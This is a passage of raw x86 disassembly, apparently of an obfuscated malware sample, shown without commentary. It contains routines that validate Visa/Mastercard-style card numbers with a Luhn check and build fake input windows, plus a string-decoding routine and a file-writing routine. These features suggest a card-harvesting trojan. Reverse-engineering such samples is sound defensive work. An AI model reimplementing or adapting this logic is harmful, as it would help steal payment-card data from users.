mov ebx, eax
mov eax, ds:100131D0h
movsx edx, word ptr ds:10013264h
add eax, edx
sub eax, 10h
cmp ebx, eax
jnz short loc_41DC5E
lea eax, ds:10013390h
mov [ebp+var_24], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_44]
push eax
push 10014A18h
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013110h
sub eax, 5
cmp ebx, eax
jnz short loc_41DC4C
lea eax, [ebp+var_48]
push eax
push 10014A18h
push [ebp+var_44]
push [ebp+var_40]
call sub_41FA4A
add esp, 10h
mov [ebp+var_4C], eax
mov eax, [ebp+var_44]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41DC4C: ; CODE XREF: sub_41DABE+169�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41DC5E: ; CODE XREF: sub_41DABE+136�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41DC67: ; CODE XREF: sub_41DABE+105�j
inc [ebp+var_8]
loc_41DC6A: ; CODE XREF: sub_41DABE+C1�j
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_41DB84
loc_41DC76: ; CODE XREF: sub_41DABE:loc_41DB66�j
lea eax, ds:100133B4h
mov [ebp+var_10], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_14]
push eax
push 10014A08h
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr ds:0[esi]
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea eax, [ebp+var_1C]
push eax
push 10014A08h
push [ebp+var_14]
push dword ptr ds:10013394h
call sub_41FA4A
add esp, 10h
mov [ebp+var_18], eax
mov ecx, ds:100131CCh
add ecx, ds:100130ECh
sub ecx, 0Ah
cmp eax, ecx
jnz short loc_41DCE6
mov eax, ds:10013394h
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword ptr ds:10013394h, 0
loc_41DCE6: ; CODE XREF: sub_41DABE+6F�j
; sub_41DABE+214�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DABE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DCEB proc near ; CODE XREF: sub_41B354+327�p
; sub_41B354+3B2�p
var_16C = byte ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 16Ch
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000F600h
lea eax, [ebp+var_168]
push eax
call sub_41FC67
push 1001409Bh
call sub_41C914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000D020h
push 10014093h
call sub_41C914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
add esp, 24h
push 0
push 80h
push 4
push 0
movsx eax, word ptr ds:100130D0h
sub eax, 7
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10012788h
mov edi, eax
push 0
push 0
push [ebp+arg_4]
push edi
call dword ptr ds:10012B9Ch
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_41DD9C: ; CODE XREF: sub_41DCEB+B6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41DD9C
mov esi, eax
push 0
lea ebx, [ebp+var_16C]
push ebx
push esi
push [ebp+arg_0]
push edi
call dword ptr ds:10012B8Ch
push edi
call dword ptr ds:10011654h
pop edi
pop esi
pop ebx
leave
retn
sub_41DCEB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push ebx
push esi
push edi
lea eax, [ebp-210h]
push eax
push 1000F0F0h
call sub_42088C
add esp, 8
mov [ebp-208h], eax
test eax, eax
jnz short loc_41DDF6
xor eax, eax
jmp loc_41DF93
; ---------------------------------------------------------------------------
loc_41DDF6: ; CODE XREF: .data:0041DDED�j
mov eax, ds:100130ECh
add eax, ds:100130DCh
sub eax, 3
mov [ebp-204h], eax
loc_41DE0A: ; CODE XREF: .data:0041DF7F�j
mov eax, [ebp-204h]
mov edx, [ebp-208h]
lea ecx, [edx+eax]
or eax, 0FFFFFFFFh
loc_41DE1C: ; CODE XREF: .data:0041DE21�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41DE1C
mov [ebp-20Ch], eax
cmp dword ptr [ebp-20Ch], 0FFh
jnb short loc_41DE60
mov eax, [ebp-204h]
movsx edx, word ptr ds:10013230h
add edx, ds:100131E8h
sub edx, 6
add eax, edx
add eax, [ebp-208h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_423399
loc_41DE60: ; CODE XREF: .data:0041DE33�j
mov eax, ds:100130C8h
mov esi, eax
add esi, ds:100131D4h
sub esi, 2
jmp short loc_41DE97
; ---------------------------------------------------------------------------
loc_41DE72: ; CODE XREF: .data:0041DEA9�j
cmp byte ptr [ebp+esi-0FFh], 28h
jnz short loc_41DE84
mov byte ptr [ebp+esi-0FFh], 2Bh
loc_41DE84: ; CODE XREF: .data:0041DE7A�j
cmp byte ptr [ebp+esi-0FFh], 29h
jnz short loc_41DE96
mov byte ptr [ebp+esi-0FFh], 3Dh
loc_41DE96: ; CODE XREF: .data:0041DE8C�j
inc esi
loc_41DE97: ; CODE XREF: .data:0041DE70�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_41DEA0: ; CODE XREF: .data:0041DEA5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41DEA0
cmp esi, eax
jb short loc_41DE72
push 0FFh
lea eax, [ebp-1FEh]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_418755
add esp, 0Ch
mov ebx, eax
mov eax, ds:10013158h
mov edi, eax
add edi, ds:1001320Ch
sub edi, 0Fh
jmp short loc_41DF08
; ---------------------------------------------------------------------------
loc_41DEDA: ; CODE XREF: .data:0041DF0A�j
movsx eax, byte ptr [ebp+edi-1FEh]
mov [ebp-218h], eax
mov eax, edi
mul edi
mov [ebp-21Ch], eax
mov eax, [ebp-218h]
mov edx, [ebp-21Ch]
sub eax, edx
mov [ebp+edi-1FEh], al
inc edi
loc_41DF08: ; CODE XREF: .data:0041DED8�j
cmp edi, ebx
jb short loc_41DEDA
mov eax, ds:10013110h
add eax, ds:10013094h
sub eax, 0Ah
push eax
push dword ptr [ebp+8]
lea eax, [ebp-1FEh]
push eax
call sub_4188C2
add esp, 0Ch
mov [ebp-214h], eax
mov eax, ds:10013140h
add eax, 0FFF6h
cmp [ebp-214h], eax
jz short loc_41DF56
push dword ptr [ebp-208h]
call dword ptr ds:1000F61Ch
xor eax, eax
inc eax
jmp short loc_41DF93
; ---------------------------------------------------------------------------
loc_41DF56: ; CODE XREF: .data:0041DF43�j
mov eax, [ebp-20Ch]
mov edx, ds:10013274h
add edx, ds:100130A8h
sub edx, 2
add eax, edx
add [ebp-204h], eax
mov eax, [ebp-210h]
cmp [ebp-204h], eax
jb loc_41DE0A
push dword ptr [ebp-208h]
call dword ptr ds:1000F61Ch
xor eax, eax
loc_41DF93: ; CODE XREF: .data:0041DDF1�j
; .data:0041DF54�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DF98 proc near ; CODE XREF: sub_418999+BA9�p
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C6 = byte ptr -2C6h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_253 = byte ptr -253h
var_23F = byte ptr -23Fh
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_106 = byte ptr -106h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_102 = word ptr -102h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_F5 = byte ptr -0F5h
var_F4 = byte ptr -0F4h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 324h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz loc_41EFC7
mov eax, [ebp+arg_0]
mov al, [eax]
cmp al, 34h
jz short loc_41DFBF
cmp al, 35h
jnz loc_41EFC7
loc_41DFBF: ; CODE XREF: sub_41DF98+1D�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_41DFC7: ; CODE XREF: sub_41DF98+34�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41DFC7
mov [ebp+var_128], eax
mov edx, ds:100131ACh
add edx, 0Bh
cmp eax, edx
jz short loc_41DFF3
movsx edx, word ptr ds:10013118h
add edx, 10h
cmp eax, edx
jnz loc_41EFC7
loc_41DFF3: ; CODE XREF: sub_41DF98+47�j
mov ebx, ds:10013254h
sub ebx, 9
jmp short loc_41E022
; ---------------------------------------------------------------------------
loc_41DFFE: ; CODE XREF: sub_41DF98+94�j
mov eax, 30h
mul ebx
mov [ebp+var_260], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_260]
cmp ds:10010370h[edx], eax
jz loc_41EFC7
inc ebx
loc_41E022: ; CODE XREF: sub_41DF98+64�j
mov eax, ds:10013138h
add eax, 64h
cmp ebx, eax
jb short loc_41DFFE
mov eax, ds:10013234h
add eax, 0Fh
cmp [ebp+var_128], eax
jnz loc_41E20D
mov eax, [ebp+arg_0]
mov al, [eax+4]
cmp al, 2Dh
jz short loc_41E054
cmp al, 20h
jnz loc_41EFC7
loc_41E054: ; CODE XREF: sub_41DF98+B2�j
mov eax, [ebp+arg_0]
mov al, [eax+9]
cmp al, 2Dh
jz short loc_41E066
cmp al, 20h
jnz loc_41EFC7
loc_41E066: ; CODE XREF: sub_41DF98+C4�j
mov eax, [ebp+arg_0]
mov al, [eax+0Eh]
cmp al, 2Dh
jz short loc_41E078
cmp al, 20h
jnz loc_41EFC7
loc_41E078: ; CODE XREF: sub_41DF98+D6�j
mov eax, ds:100131ACh
mov edx, [ebp+arg_0]
mov dl, [edx]
mov [ebp+eax+var_104], dl
mov eax, ds:10013270h
mov edx, [ebp+arg_0]
mov dl, [edx+1]
mov byte ptr [ebp+eax+var_102], dl
mov eax, ds:100131D4h
mov edx, [ebp+arg_0]
mov dl, [edx+2]
mov [ebp+eax+var_FF], dl
movsx eax, word ptr ds:10013100h
movsx edx, word ptr ds:10013174h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+3]
mov [ebp+eax+var_106], dl
mov eax, ds:10013220h
mov edx, [ebp+arg_0]
mov dl, [edx+5]
mov [ebp+eax+var_FF], dl
mov eax, ds:1001310Ch
add eax, ds:10013248h
mov edx, [ebp+arg_0]
mov dl, [edx+6]
mov [ebp+eax+var_100], dl
movsx eax, word ptr ds:10013208h
mov edx, [ebp+arg_0]
mov dl, [edx+7]
mov [ebp+eax+var_FE], dl
mov eax, ds:100130F8h
movsx edx, word ptr ds:10013230h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+8]
mov [ebp+eax+var_105], dl
mov eax, ds:1001315Ch
mov edx, [ebp+arg_0]
mov dl, [edx+0Ah]
mov [ebp+eax+var_100], dl
movsx eax, word ptr ds:100130A4h
mov edx, ds:100130ACh
lea eax, [eax+edx+2]
mov edx, [ebp+arg_0]
mov dl, [edx+0Bh]
mov [ebp+eax+var_FF], dl
mov eax, ds:10013154h
inc eax
add eax, ds:100131A8h
mov edx, [ebp+arg_0]
mov dl, [edx+0Ch]
mov [ebp+eax+var_FF], dl
movsx eax, word ptr ds:1001324Ch
mov edx, ds:1001318Ch
lea eax, [eax+edx+2]
mov edx, [ebp+arg_0]
mov dl, [edx+0Dh]
mov [ebp+eax+var_FF], dl
mov eax, ds:100130DCh
add eax, 6
movsx edx, word ptr ds:100131F0h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+0Fh]
mov [ebp+eax+var_FF], dl
movsx eax, word ptr ds:10013260h
mov edx, [ebp+arg_0]
mov dl, [edx+10h]
mov [ebp+eax+var_F4], dl
movsx eax, word ptr ds:10013230h
movsx edx, word ptr ds:1001316Ch
lea eax, [eax+edx+7]
mov edx, [ebp+arg_0]
mov dl, [edx+11h]
mov [ebp+eax+var_FF], dl
mov eax, ds:10013094h
add eax, 4
add eax, ds:1001317Ch
mov edx, [ebp+arg_0]
mov dl, [edx+12h]
mov [ebp+eax+var_FF], dl
mov eax, ds:1001319Ch
mov edx, ds:100130D4h
sub edx, 6
mov [ebp+eax+var_F5], dl
jmp short loc_41E21C
; ---------------------------------------------------------------------------
loc_41E20D: ; CODE XREF: sub_41DF98+A4�j
push [ebp+arg_0]
lea eax, [ebp+var_FF]
push eax
call sub_423399
loc_41E21C: ; CODE XREF: sub_41DF98+273�j
mov eax, ds:10013158h
mov esi, eax
add esi, ds:1001325Ch
sub esi, 11h
jmp short loc_41E243
; ---------------------------------------------------------------------------
loc_41E22E: ; CODE XREF: sub_41DF98+2B9�j
mov al, [ebp+esi+var_FF]
cmp al, 30h
jl short loc_41E23D
cmp al, 39h
jle short loc_41E242
loc_41E23D: ; CODE XREF: sub_41DF98+29F�j
jmp loc_41EFC7
; ---------------------------------------------------------------------------
loc_41E242: ; CODE XREF: sub_41DF98+2A3�j
inc esi
loc_41E243: ; CODE XREF: sub_41DF98+294�j
mov eax, ds:1001320Ch
inc eax
add eax, ds:10013214h
cmp esi, eax
jb short loc_41E22E
mov eax, ds:10013210h
add eax, ds:100131A8h
sub eax, 3
mov [ebp-108h], eax
mov eax, ds:100131ACh
movsx edx, word ptr ds:10013180h
mov esi, eax
add esi, edx
sub esi, 9
jmp short loc_41E2C7
; ---------------------------------------------------------------------------
loc_41E27C: ; CODE XREF: sub_41DF98+339�j
movsx eax, [ebp+esi+var_FF]
sub eax, 30h
movsx edx, word ptr ds:10013100h
movsx ecx, word ptr ds:10013104h
add edx, ecx
sub edx, 9
imul eax, edx
add [ebp-108h], eax
cmp [ebp+esi+var_FF], 34h
jle short loc_41E2BD
movsx eax, word ptr ds:10013250h
add eax, 8
sub [ebp-108h], eax
loc_41E2BD: ; CODE XREF: sub_41DF98+313�j
mov eax, ds:100131B8h
sub eax, 3
add esi, eax
loc_41E2C7: ; CODE XREF: sub_41DF98+2E2�j
mov eax, ds:10013268h
add eax, 0Ch
cmp esi, eax
jb short loc_41E27C
mov eax, ds:10013120h
mov ebx, eax
add ebx, ds:1001315Ch
sub ebx, 0Dh
jmp short loc_41E303
; ---------------------------------------------------------------------------
loc_41E2E5: ; CODE XREF: sub_41DF98+375�j
movsx eax, [ebp+ebx+var_FF]
sub eax, 30h
add [ebp-108h], eax
mov eax, ds:10013190h
add eax, ds:1001318Ch
add ebx, eax
loc_41E303: ; CODE XREF: sub_41DF98+34B�j
mov eax, ds:10013094h
add eax, 0Ah
cmp ebx, eax
jb short loc_41E2E5
mov eax, [ebp-108h]
mov ecx, 0Ah
xor edx, edx
div ecx
movsx edi, word ptr ds:100131A4h
add edi, ds:1001311Ch
sub edi, 0Ch
cmp edx, edi
jnz loc_41EFC7
lea eax, [ebp+var_FF]
push eax
call dword ptr ds:10012774h
pop ecx
or eax, eax
jnz loc_41EFC7
mov esi, ds:100131F8h
sub esi, 3
mov eax, ds:100131D0h
mov esi, eax
add esi, ds:10013284h
sub esi, 10h
jmp short loc_41E37F
; ---------------------------------------------------------------------------
loc_41E367: ; CODE XREF: sub_41DF98+3F7�j
mov eax, 30h
mul esi
mov [ebp+var_264], eax
cmp dword ptr ds:10010370h[eax], 0
jz short loc_41E391
inc esi
loc_41E37F: ; CODE XREF: sub_41DF98+3CD�j
mov eax, ds:10013220h
add eax, 5Eh
add eax, ds:100131D4h
cmp esi, eax
jb short loc_41E367
loc_41E391: ; CODE XREF: sub_41DF98+3E4�j
mov eax, ds:100130ACh
add eax, 63h
cmp esi, eax
jz loc_41EFC7
mov eax, 30h
mul esi
mov [ebp+var_268], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_268]
mov ds:10010370h[edx], eax
push 10014081h
call sub_41C914
pop ecx
push 0
push eax
push 0
push [ebp+arg_4]
call dword ptr ds:1001263Ch
mov [ebp+var_134], eax
test eax, eax
jnz short loc_41E3EA
mov eax, [ebp+arg_4]
mov [ebp+var_134], eax
loc_41E3EA: ; CODE XREF: sub_41DF98+447�j
push 10014074h
call sub_41C914
push eax
push [ebp+var_134]
call sub_41FAF0
mov [ebp+var_12C], eax
push 10014068h
call sub_41C914
push eax
push [ebp+var_12C]
call sub_41FAF0
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_26C], eax
mov ebx, eax
mov ds:10010374h[ebx], edi
push 0
mov eax, 30h
mul esi
mov [ebp+var_270], eax
push dword ptr ds:10010374h[eax]
call dword ptr ds:1001265Ch
lea eax, [ebp+var_11C]
push eax
push [ebp+var_12C]
call dword ptr ds:10012654h
push 0
call dword ptr ds:1000F5E8h
mov [ebp+var_10C], eax
push 1001405Eh
call sub_41C914
add esp, 1Ch
push 0
push [ebp+var_10C]
push 0
push [ebp+var_12C]
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
push edi
mov edi, [ebp+var_114]
sub edi, [ebp+var_11C]
push edi
mov edi, ds:100131F8h
sub edi, 3
push edi
movsx edi, word ptr ds:10013178h
sub edi, 4
push edi
push 50800000h
lea edi, [ebp+var_FF]
push edi
push eax
push 200h
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_274], eax
mov ebx, eax
mov ds:10010378h[ebx], edi
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
movsx ebx, word ptr ds:10013240h
mov edx, ds:100130F0h
lea ebx, [ebx+edx+0F7h]
sub edi, ebx
mov ebx, ds:10013248h
add ebx, 37h
add ebx, ds:10013200h
mov eax, edi
sub eax, ebx
xor edx, edx
test eax, eax
setl dl
add eax, edx
sar eax, 1
mov [ebp+var_124], eax
mov eax, ds:100130B4h
movsx edx, word ptr ds:100131E0h
add eax, edx
sub eax, 0Bh
cmp [ebp+var_124], eax
jge short loc_41E55A
mov eax, ds:10013128h
sub eax, 8
mov [ebp+var_124], eax
loc_41E55A: ; CODE XREF: sub_41DF98+5B2�j
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
movsx edx, word ptr ds:100131A4h
movsx ecx, word ptr ds:10013180h
lea edx, [edx+ecx+22h]
sub eax, edx
mov [ebp+var_120], eax
push 10014054h
call sub_41C914
mov [ebp+var_278], eax
push 1001403Bh
call sub_41C914
mov [ebp+var_27C], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_280], eax
mov edi, eax
push dword ptr ds:10010378h[edi]
movsx edi, word ptr ds:10013230h
add edi, 36h
push edi
push [ebp+var_120]
push [ebp+var_124]
movsx edi, word ptr ds:100130BCh
mov ebx, ds:100131CCh
lea edi, [edi+ebx+5]
push edi
push 50800000h
mov edi, [ebp+var_27C]
push edi
mov edi, [ebp+var_278]
push edi
mov edi, ds:100131D4h
add edi, ds:1001321Ch
sub edi, 0Ah
push edi
call dword ptr ds:1001164Ch
mov [ebp+var_138], eax
push 10014031h
call sub_41C914
mov [ebp+var_284], eax
push 1001402Dh
call sub_41C914
mov [ebp+var_288], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_28C], eax
mov edi, eax
push dword ptr ds:10010378h[edi]
movsx edi, word ptr ds:1001324Ch
mov ebx, ds:100131D0h
lea edi, [edi+ebx+0EAh]
push edi
push [ebp+var_120]
mov edi, [ebp+var_124]
mov ebx, ds:10013108h
add ebx, 36h
add edi, ebx
mov ebx, ds:100130D4h
movsx edx, word ptr ds:10013178h
add ebx, edx
sub ebx, 9
add edi, ebx
push edi
mov edi, ds:100130ECh
add edi, 10h
push edi
push 50800009h
mov edi, [ebp+var_288]
push edi
mov edi, [ebp+var_284]
push edi
mov edi, ds:10013210h
dec edi
push edi
call dword ptr ds:1001164Ch
mov [ebp+var_13C], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, ds:100130B8h
sub eax, 3
push eax
mov eax, ds:100131ECh
add eax, ds:100131B8h
sub eax, 0Dh
push eax
movsx eax, word ptr ds:1001322Ch
movsx edx, word ptr ds:100131E0h
add eax, edx
sub eax, 0Ah
push eax
push 2BCh
mov eax, ds:1001320Ch
sub eax, 6
push eax
mov eax, ds:100130F0h
dec eax
push eax
mov eax, ds:100130E4h
dec eax
push eax
mov eax, ds:10013204h
add eax, 0Dh
add eax, ds:1001319Ch
push eax
call dword ptr ds:10010250h
mov [ebp+var_140], eax
push 1
push eax
push 30h
push [ebp+var_138]
call dword ptr ds:1000D014h
push 10014023h
call sub_41C914
mov [ebp+var_290], eax
push 1001401Eh
call sub_41C914
add esp, 18h
push 0
push [ebp+var_10C]
push 0
push [ebp+var_13C]
movsx edi, word ptr ds:10013240h
add edi, 0F8h
mov ebx, ds:10013204h
movsx edx, word ptr ds:10013124h
add ebx, edx
sub ebx, 3
sub edi, ebx
push edi
mov edi, [ebp+var_120]
mov ebx, ds:100131CCh
sub ebx, 2
sub edi, ebx
push edi
movsx edi, word ptr ds:1001316Ch
movsx ebx, word ptr ds:10013150h
add edi, ebx
sub edi, 8
push edi
movsx edi, word ptr ds:100131C0h
movsx ebx, word ptr ds:100130C0h
add edi, ebx
sub edi, 5
push edi
push 50000000h
push eax
mov edi, [ebp+var_290]
push edi
mov edi, ds:100130E4h
add edi, ds:10013268h
sub edi, 0Dh
push edi
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_294], eax
mov ebx, eax
mov ds:1001037Ch[ebx], edi
mov eax, ds:100130E4h
cmp [ebp+eax+var_108], 34h
jnz short loc_41E837
push 10014016h
call sub_41C914
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_423399
jmp short loc_41E84F
; ---------------------------------------------------------------------------
loc_41E837: ; CODE XREF: sub_41DF98+883�j
push 10014008h
call sub_41C914
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_423399
loc_41E84F: ; CODE XREF: sub_41DF98+89D�j
push 10013F96h
call sub_41C914
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_253]
push edi
push eax
lea edi, [ebp+var_23F]
push edi
call dword ptr ds:10012634h
push 10013F8Ch
call sub_41C914
mov [ebp+var_298], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_29C], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
mov edi, ds:10013164h
add edi, 2Ch
push edi
push [ebp+var_120]
mov edi, ds:100131E4h
add edi, 6
push edi
mov edi, ds:10013244h
movsx ebx, word ptr ds:100130B0h
add edi, ebx
dec edi
push edi
push 50000000h
lea edi, [ebp+var_23F]
push edi
mov edi, [ebp+var_298]
push edi
mov edi, ds:10013188h
add edi, ds:10013090h
sub edi, 3
push edi
call dword ptr ds:1001164Ch
mov [ebp+var_258], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, ds:1001319Ch
sub eax, 6
push eax
mov eax, ds:10013158h
sub eax, 9
push eax
movsx eax, word ptr ds:100130D0h
sub eax, 7
push eax
push 190h
movsx eax, word ptr ds:10013208h
add eax, ds:10013120h
sub eax, 0Ah
push eax
mov eax, ds:100131ACh
add eax, ds:1001323Ch
sub eax, 0Ah
push eax
mov eax, ds:100131D0h
add eax, ds:100130ACh
sub eax, 2
push eax
mov eax, ds:10013220h
add eax, 0Ch
push eax
call dword ptr ds:10010250h
mov [ebp+var_130], eax
push 1
push eax
push 30h
push [ebp+var_258]
call dword ptr ds:1000D014h
push 10013F80h
call sub_41C914
mov [ebp+var_2A0], eax
push 10013F7Ch
call sub_41C914
mov [ebp+var_2A4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A8], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
mov edi, ds:10013200h
add edi, 11Fh
add edi, ds:100131ECh
push edi
mov edi, ds:100131B8h
add edi, 2Dh
push edi
mov edi, ds:100130F0h
add edi, 45h
movsx ebx, word ptr ds:10013208h
add edi, ebx
push edi
movsx edi, word ptr ds:10013118h
add edi, ds:10013254h
sub edi, 2
push edi
push 50800003h
mov edi, [ebp+var_2A4]
push edi
mov edi, [ebp+var_2A0]
push edi
mov edi, ds:10013168h
add edi, ds:1001312Ch
sub edi, 8
push edi
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2AC], eax
mov ebx, eax
mov ds:10010380h[ebx], edi
push 10013F70h
call sub_41C914
mov [ebp+var_2B0], eax
push 10013F6Ch
call sub_41C914
add esp, 28h
mov [ebp+var_2B4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B8], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
mov edi, ds:100131B0h
add edi, 125h
push edi
mov edi, ds:100131ACh
add edi, 34h
add edi, ds:100131A0h
push edi
mov edi, ds:1001325Ch
add edi, 41h
add edi, ds:100131D4h
push edi
mov edi, ds:10013120h
lea edi, [edi+edi+3Ch]
push edi
push 50800003h
mov edi, [ebp+var_2B4]
push edi
mov edi, [ebp+var_2B0]
push edi
movsx edi, word ptr ds:100130E0h
add edi, ds:10013108h
sub edi, 7
push edi
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2BC], eax
mov ebx, eax
mov ds:10010384h[ebx], edi
movsx eax, word ptr ds:100130E8h
add eax, ds:100131F8h
sub eax, 3
mov [ebp+var_102], ax
jmp loc_41EBE3
; ---------------------------------------------------------------------------
loc_41EB1D: ; CODE XREF: sub_41DF98+C5E�j
push 10013F64h
call sub_41C914
movzx edi, [ebp+var_102]
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call dword ptr ds:10012634h
lea eax, [ebp+var_2C6]
push eax
movsx eax, word ptr ds:10013208h
movsx edx, word ptr ds:10013124h
add eax, edx
sub eax, 0Bh
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:1000D014h
push 10013F5Ah
call sub_41C914
movzx edi, [ebp+var_102]
movsx ebx, word ptr ds:100130E0h
lea edi, [edi+ebx+5]
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call dword ptr ds:10012634h
add esp, 20h
lea eax, [ebp+var_2C6]
push eax
movsx eax, word ptr ds:100130A4h
add eax, ds:10013134h
sub eax, 0Eh
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:1000D014h
inc [ebp+var_102]
loc_41EBE3: ; CODE XREF: sub_41DF98+B80�j
movzx eax, [ebp+var_102]
movsx edx, word ptr ds:10013208h
add edx, 8
cmp eax, edx
jl loc_41EB1D
push 10013F52h
call sub_41C914
mov [ebp+var_2C0], eax
push 10013F4Eh
call sub_41C914
mov [ebp+var_2C4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp-2C8h], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
mov edi, ds:10013204h
add edi, 17h
push edi
movsx edi, word ptr ds:100130BCh
mov ebx, ds:100131D8h
lea edi, [edi+ebx+43h]
push edi
mov edi, ds:100131ECh
add edi, 74h
push edi
mov edi, ds:100131F4h
add edi, 2Bh
push edi
push 50800000h
mov edi, [ebp+var_2C4]
push edi
mov edi, [ebp+var_2C0]
push edi
push 200h
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
